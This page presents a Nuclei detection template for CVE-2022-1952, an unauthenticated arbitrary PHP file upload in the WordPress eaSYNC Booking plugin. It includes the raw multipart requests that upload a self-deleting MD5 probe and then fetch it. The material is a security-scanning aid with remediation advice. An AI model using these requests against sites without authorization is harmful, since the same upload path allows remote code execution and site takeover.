WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
ID: CVE-2022-1952
Severity: critical
Author: theamanrawat
Tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics
Description

WordPress eaSYNC Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin performs insufficient input validation in an AJAX action: an allowlist of valid file extensions is defined but is never consulted during validation, so an unauthenticated request can place a file with any extension (including .php) in the site's uploads directory. An attacker can use this to obtain sensitive information, modify data, or execute unauthorized administrative operations in the context of the affected site.
YAML Source

id: CVE-2022-1952

info:
  name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could result in remote code execution, allowing an attacker to take complete control of the affected WordPress site.
  remediation: |
    Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
    - https://wordpress.org/plugins/easync-booking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1952
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1952
    cwe-id: CWE-434
    epss-score: 0.79729
    epss-percentile: 0.98289
    cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: syntactics
    product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental
    framework: wordpress
  tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics

variables:
  string: "CVE-2022-1952"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
        Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059

        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="action"

        easync_session_store
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="type"

        car
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="with_driver"

        self-driven
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        --------------------------98efee55508c5059--

      - |
        GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37

      - |
        GET /wp-content/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
        internal: true
# digest: 4a0a00473045022100b064b2f1b570ae7d1f5c4f2094b8539b60b1c447962495c8a36ad4099da0f0c902205553b9aad8f0b271b78d8a8d72c33b8d76866a9a454a325c4e73b9de50216888:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template confirms the vulnerability by replaying the plugin's booking flow in three requests. The first POSTs a multipart form to the easync_session_store AJAX action with a .php file in the driver_license_image2 field; the probe prints md5("CVE-2022-1952") and then unlinks itself. The second request calls easync_success_and_save with the same PHPSESSID cookie as the first. The stored basename is pulled from the JSON-escaped upload path (wp-content\/uploads\/<name>.php) in the plugin's response by the internal extractor, and the third request fetches /wp-content/uploads/<name>.php and matches the body against the expected MD5. The template is tagged intrusive because it writes an executable file to the target; the probe removes itself after it runs, but use the template only against sites you are authorized to test.

$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1952.yaml"